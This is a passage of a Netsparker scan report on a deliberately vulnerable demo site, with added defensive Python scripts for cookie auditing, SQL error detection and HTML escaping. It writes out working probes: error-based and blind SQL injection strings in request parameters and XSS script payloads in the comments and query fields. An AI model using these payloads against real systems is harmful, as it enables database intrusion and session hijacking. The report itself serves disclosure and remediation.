Set-Cookie: AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
Set-Cookie: Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 155
Content-Type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://hackyourselffirst.troyhunt.com/">here</a>.</h2></body></html>
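None of the three Set-Cookie lines in the response above carries a Secure or HttpOnly attribute, and two of them (Password=Mw== and Email=netsparker@example.com) persist the submitted credentials client-side for a year; Mw== is nothing more than base64 of the password 3 that was posted. The script below is an added example, not part of the report and not Supercar Showdown code. It parses Set-Cookie headers the way a response-inspection check would, flags the missing attributes and decodes the Password cookie. The header values are constructed from the response above with the AuthCookie value shortened, and SENSITIVE_COOKIES is an assumed list for this site.

```python
import base64
from typing import Dict, List

# Constructed sample: the Set-Cookie lines the login response above returns, with
# the AuthCookie value shortened for readability (the real one is a long hex blob).
LOGIN_SET_COOKIE_HEADERS = [
    "AuthCookie=83F87081CDBC4CAC96FBBA3C773F139F; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
    "Password=Mw==; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
    "Email=netsparker@example.com; expires=Tue, 25-Aug-2015 22:59:00 GMT; path=/",
]

# Cookies that carry authentication or personal data and therefore must be Secure
# and HttpOnly. Assumed list for this site; adjust per application.
SENSITIVE_COOKIES = {"AuthCookie", "ASP.NET_SessionId", "Password", "Email"}


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split one Set-Cookie header into name, value and a dict of attributes.

    Attribute names are case-insensitive (RFC 6265), so they are lower-cased.
    Flag attributes such as Secure and HttpOnly are stored with the value True.
    """
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, has_eq, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if has_eq else True
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_cookies(headers: List[str], response_over_https: bool = True) -> List[str]:
    """Return one finding per weakness; an empty list means every sensitive cookie is clean."""
    findings: List[str] = []
    for header in headers:
        cookie = parse_set_cookie(header)
        name, attrs = cookie["name"], cookie["attrs"]
        if name not in SENSITIVE_COOKIES:
            continue
        if "secure" not in attrs:
            where = "set over HTTPS but" if response_over_https else "set over HTTP and"
            findings.append(f"{name}: {where} not marked Secure; browser will send it on http:// requests")
        if "httponly" not in attrs:
            findings.append(f"{name}: not marked HttpOnly; readable by injected script via document.cookie")
        if name in ("Password", "Email"):
            findings.append(f"{name}: credential material stored client-side in a persistent cookie")
    return findings


def decode_password_cookie(value: str) -> str:
    """The Password cookie is only base64-encoded, not encrypted: 'Mw==' decodes to '3'."""
    return base64.b64decode(value).decode("utf-8")


if __name__ == "__main__":
    for finding in audit_cookies(LOGIN_SET_COOKIE_HEADERS):
        print(finding)
    print("Password cookie decodes to:", decode_password_cookie("Mw=="))
```

The audit only looks at attributes the server sent; a cookie that is Secure but scoped with path=/ to a host that still answers on port 80 is still exposed to the redirect-to-HTTP behaviour shown above, so the fix has to cover both the attribute and the HTTP listener.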
IMPORTANT: 1 total

7. Out-of-date Version (Microsoft SQL Server)
Netsparker identified that you are using an out-of-date version of Microsoft SQL Server.

Impact
Since this is an old version of the software, it may be vulnerable to attacks.

Remedy
Please upgrade your installation of Microsoft SQL Server to the latest stable version.

Classification
OWASP 2010-A6, OWASP 2013-A9, PCI v2.0-6.1, PCI v3.0-6.1, CAPEC-310

7.1 /Make/1
http://hackyourselffirst.troyhunt.com/Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA…
Identified Version: 11.0.9222.17
Latest Version: 12.00.2000
Vulnerability Database: result is based on 18/08/2014 vulnerability database content
Certainty:
Request
GET /Make/1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Date: Mon, 25 Aug 2014 22:59:55 GMT
Server: Microsoft-IIS/8.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>
<meta name="viewport" content="width=device-width" />
<style>
 body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
 p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
 b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
 H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
 H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
 pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt}
 .marker {font-weight: bold; color: black;text-decoration: none;}
 .version {color: gray;}
 .error {margin-bottom: 10px;}
 .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
 @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } }
 @media screen and (max-width: 479px) { pre { width: 280px; } }
</style>
</head>
<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please revie…
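The request above is an error-based probe: the orderby value assembles the marker string from CHAR() codes (so the payload needs no quote characters) and asks SQL Server to convert it to int; the unhandled SqlException then echoes the marker in the page title. That echo, together with the T-SQL-specific CHAR() and convert() syntax, is what fingerprints the engine, while the version number itself comes from the @@version probes visible in finding 4.1. The script below is an added example, not Netsparker's or the site's code: it decodes the CHAR() payload, scans response bodies for SQL Server error signatures and compares version strings. The sample responses are constructed, trimmed copies of the two 500 responses shown in this report.

```python
import re
from typing import Dict, List, Optional, Tuple

# Error text SQL Server emits when injected input breaks or is coerced by a query.
# Any of these appearing verbatim in an HTTP response means the raw SqlException
# text reaches the client (the report's Database Error Message Disclosure item).
MSSQL_ERROR_SIGNATURES = [
    ("conversion-error", r"Conversion failed when converting the n?varchar value '(?P<marker>[^']*)' to data type int"),
    ("unclosed-quote", r"Unclosed quotation mark after the character string '(?P<marker>[^']*)'"),
    ("syntax-error", r"Incorrect syntax near '(?P<marker>[^']*)'"),
]

# Constructed samples modelled on the 500 responses in findings 7.1 and 9.1 (trimmed),
# plus one clean page. Keys are the request paths.
SAMPLE_RESPONSES = {
    "/Make/1?orderby=...": "<title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title>",
    "/api/vote": '{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string \'\\"--></style>)\'.\\r\\nIncorrect syntax near \'\\"--></style>)\'."}',
    "/Supercar/Leaderboard": "<html><body><table><tr><td>Troy Hunt</td></tr></table></body></html>",
}


def decode_char_concat(sql_fragment: str) -> str:
    """Turn CHAR(95)+CHAR(33)+... (as in the orderby payload) back into the marker text.

    If the decoded marker later appears inside a conversion error, the string was
    evaluated by SQL Server, which confirms the injection and identifies the engine.
    """
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", sql_fragment, re.IGNORECASE))


def find_mssql_error(body: str) -> Optional[Tuple[str, str]]:
    """Return (signature name, echoed marker) for the first SQL Server error found, else None."""
    for name, pattern in MSSQL_ERROR_SIGNATURES:
        match = re.search(pattern, body)
        if match:
            return (name, match.group("marker"))
    return None


def parse_version(version: str) -> Tuple[int, ...]:
    """'11.0.9222.17' -> (11, 0, 9222, 17); tolerant of zero-padded forms like '12.00.2000'."""
    return tuple(int(part) for part in version.split("."))


def is_out_of_date(identified: str, latest: str) -> bool:
    """Compare major.minor only: 11.0.x is the SQL Server 2012 line, 12.0.x is 2014.

    The build component can only be ordered within one release line, so it is
    deliberately ignored here; see the caveat in the surrounding text.
    """
    return parse_version(identified)[:2] < parse_version(latest)[:2]


def triage(responses: Dict[str, str]) -> List[str]:
    """One line per response that leaks a SQL Server error, with the echoed marker."""
    out: List[str] = []
    for path, body in responses.items():
        hit = find_mssql_error(body)
        if hit:
            out.append(f"{path}: {hit[0]} (echoed: {hit[1]!r})")
    return out


if __name__ == "__main__":
    payload = "convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))"
    print("marker:", decode_char_concat(payload))
    for line in triage(SAMPLE_RESPONSES):
        print(line)
    print("out of date:", is_out_of_date("11.0.9222.17", "12.00.2000"))
```

The report lists this finding as unconfirmed, and a version-database comparison of this kind cannot distinguish an unpatched self-managed instance from a hosted database service whose builds follow their own numbering; treat the comparison as a prompt to verify the build against the vendor's release list, not as proof. The error-message disclosure, by contrast, is visible in the response itself and is fixed by turning custom errors on and logging the exception server-side.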
MEDIUM: 1 total, 1 confirmed

8. Critical Form Served over HTTP
Netsparker detected that a critical form is served over HTTP.

Impact
If an attacker can carry out a man-in-the-middle attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or by changing the action of the form in order to steal the user's password. Even though the target of the form is an HTTPS URL, this does not protect the system against man-in-the-middle attacks: the attacker controls the page before the form is ever submitted.
This issue is important as it negates the use of SSL as a privacy protection barrier.

Actions to Take
1. See the remedy for solution.
2. Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP.

Remedy
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS. Redirect HTTP requests for these pages to HTTPS, and consider HTTP Strict Transport Security so that a returning browser never issues the plain-HTTP request in the first place.

Classification
OWASP 2010-A9, OWASP 2013-A6, PCI v2.0-6.5.4, PCI v3.0-6.5.4, CWE-319, CAPEC-65, WASC-04

8.1 /Account/Login CONFIRMED
http://hackyourselffirst.troyhunt.com/Account/Login
Form target action: https://hackyourselffirst.troyhunt.com/Account/Login
Request
GET /Account/Login HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Aug 2014 22:58:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNetMvc-Version: 5.1
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Encoding:
Content-Length: 2549
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<title>Log in - Supercar Showdown</title>
<link href="/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<meta name="viewport" content="width=device-width" />
<link href="/Content/site?v=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1" rel="stylesheet"/>
</head><body><header class="navbar-wrapper"><div class="container"><div class="navbar navbar-inverse"><div class="navbar-inner">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button>
<a class="brand" href="http://hackyourselffirst.troyhunt.com/">Supercar Showdown</a>
<div class="nav-collapse collapse"><ul class="nav">
<li><a href="http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard">Leaderboard</a></li>
<li class="dropdown"><a href="#" class="dropdown-toggle" data-toggle="dropdown">My account <b class="caret"></b></a>
<ul class="dropdown-menu">
<form action="http://hackyourselffirst.troyhunt.com/Account/LogOff" id="logoutForm" method="post" class="navbar-form"></form>
<li><a href="https://hackyourselffirst.troyhunt.com/Account/ChangePassword">Change password</a></li>
<li><a href="http://hackyourselffirst.troyhunt.com/Account/UserProfile">Edit profile</a></li><…
MEDIUM: 3 total

9. [Possible] Cross-site Scripting
Netsparker detected possible cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.
Although Netsparker believes there is a cross-site scripting here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking the user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks

Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered/encoded. Output should be filtered/encoded according to the output format and location.
There are a number of pre-defined, well-structured whitelist libraries available for many different environments. Good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet

External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI v2.0-6.5.7, PCI v3.0-6.5.7, CWE-79, CAPEC-19, WASC-08

9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote
Parameters
Parameter    Type   Value
userId       POST   1
supercarId   POST   3
comments     POST   "--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues; you need to manually confirm this problem. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer. The response below is a 500 with Content-Type: application/json whose body is a raw SqlException message: the probe is echoed only because its quote character broke the SQL statement that comments is concatenated into, which is the SQL injection finding on this same parameter. The stored rendering of the same parameter on /Supercar/3 is covered by the Permanent Cross-site Scripting finding.
Certainty:
Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments="--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt…
Parameters
Parameter   Type   Value
nsextt      GET    "--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>

Notes
Due to the Content-type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-type header indicates that there is a possibility of exploitation by changing the attack. However, Netsparker does not support confirming these issues; you need to manually confirm this problem. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers with automatic MIME sniffing, such as Internet Explorer. Note that nsextt is not a parameter the application defines: it is an extra parameter the scanner appends to see whether the endpoint reflects unknown query-string input.
Certainty:

Request
GET /api/admin?nsextt=%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
IMPORTANT: 1 total, 1 confirmed

4. Permanent Cross-site Scripting
Netsparker identified permanent cross-site scripting and confirmed this vulnerability by analyzing the execution of injected JavaScript.
Permanent XSS allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript by the browser.
Permanent means that the attack will be stored in the backend system. In normal (reflected) XSS attacks an attacker needs to deliver a crafted link to the victim, for example by e-mail, but in a permanent XSS an attacker can just execute the attack once and wait for users to see the affected page. As soon as someone visits the page, the attacker's stored payload will get executed.
XSS targets the users of the application instead of the server. Although this is a limitation, since it only allows attackers to hijack other users' sessions, the attacker might attack an administrator to gain full control over the application.

Impact
Permanent XSS is a dangerous issue that has many exploitation vectors, some of which include:
- Users' session-sensitive information, such as cookies, can be stolen.
- XSS can enable client-side worms, which could modify, delete or steal other users' data within the application.
- The website can be redirected to a new location, defaced or used as a phishing site.

Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered. Output should be encoded according to the output format and location. Typically the output location is HTML. Where the output is HTML, ensure all active content is removed or entity-encoded before it is rendered to the user, and encode for the exact context the value lands in (element content, attribute value, JavaScript string, URL), since a single filter cannot be correct for all of them.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a whitelist. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well-structured whitelist libraries available for many different environments; good examples of these include the OWASP Reform and Microsoft Anti-cross-site scripting libraries.

Remedy References
[ASP.NET] - Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java

External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling

Classification
OWASP 2010-A2, OWASP 2013-A3, PCI v2.0-6.5.7, PCI v3.0-6.5.7, CWE-79, CAPEC-19, WASC-08

4.1 /Supercar/3 CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/3
Injection URL: http://hackyourselffirst.troyhunt.com/api/vote
Injection Request
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 77
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%22%3e%3cnet+sparker%3dnetsparker(0x00043F)%3e

Identification Request
GET /Supercar/3 HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Injection Response
HTTP/1.1 201 Created
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:53 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 0
Expires: -1

Identification Response
…1)) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)),1,1)),0)=1</td></tr><tr><td>Troy Hunt</td><td>"><net sparker=netsparker(0x00043F)></td></tr><tr><td>Troy Hunt</td><td>-1 OR 1=1) AND ISNULL(ASCII(SUBSTRING(CAST((SELECT @@version) AS varchar(8000)…
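Finding 4.1 shows the comments value posted to /api/vote coming back inside a <td> on /Supercar/3 byte for byte, alongside earlier blind-SQL-injection probes that were stored as comments, and the responses carry X-XSS-Protection: 0, which switches off the one browser-side mitigation that might otherwise have interfered. The script below is an added example, not the site's own rendering code: it reconstructs the vulnerable concatenation, renders the same row with HTML entity encoding, and runs both through an HTML tokenizer to list the elements a browser would create, which is the check that turns an echoed marker into a confirmed finding. The two probe strings are copied from findings 4.1 and 9.1; render_comment_row_vulnerable is a hypothetical reconstruction of the rendering step, and this one block also serves the [Possible] Cross-site Scripting finding above.

```python
import html
from html.parser import HTMLParser
from typing import List

# The two probes the scanner submitted in the comments field, copied from findings 4.1 and 9.1.
STORED_PROBE = '"><net sparker=netsparker(0x00043F)>'
SCRIPT_PROBE = '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>'


def render_comment_row_vulnerable(author: str, comment: str) -> str:
    """What the /Supercar/3 page above effectively does: raw concatenation into HTML.

    Hypothetical reconstruction of the rendering step, not the site's own code.
    """
    return "<tr><td>" + author + "</td><td>" + comment + "</td></tr>"


def render_comment_row_hardened(author: str, comment: str) -> str:
    """Same row with every untrusted value entity-encoded for element content.

    quote=True also encodes quotes, which matters the moment the same value is
    reused inside an attribute; other contexts (JavaScript strings, URLs) need
    their own encoders, not this one.
    """
    return "<tr><td>{}</td><td>{}</td></tr>".format(
        html.escape(author, quote=True), html.escape(comment, quote=True)
    )


class TagCollector(HTMLParser):
    """Records the start tags a tokenizer sees in a fragment (tag names are lower-cased)."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def tags_in(fragment: str) -> List[str]:
    parser = TagCollector()
    parser.feed(fragment)
    return parser.tags


def injected_tags(rendered: str, template_tags: List[str]) -> List[str]:
    """Elements in the rendered output that the template did not put there.

    A non-empty result means user input changed the document structure, which is
    the stored-XSS condition; an empty result with the probe still visible as text
    means the encoding held.
    """
    return [t for t in tags_in(rendered) if t not in template_tags]


if __name__ == "__main__":
    for probe in (STORED_PROBE, SCRIPT_PROBE):
        vulnerable = render_comment_row_vulnerable("Troy Hunt", probe)
        hardened = render_comment_row_hardened("Troy Hunt", probe)
        print("vulnerable:", injected_tags(vulnerable, ["tr", "td"]))
        print("hardened:  ", injected_tags(hardened, ["tr", "td"]))
```

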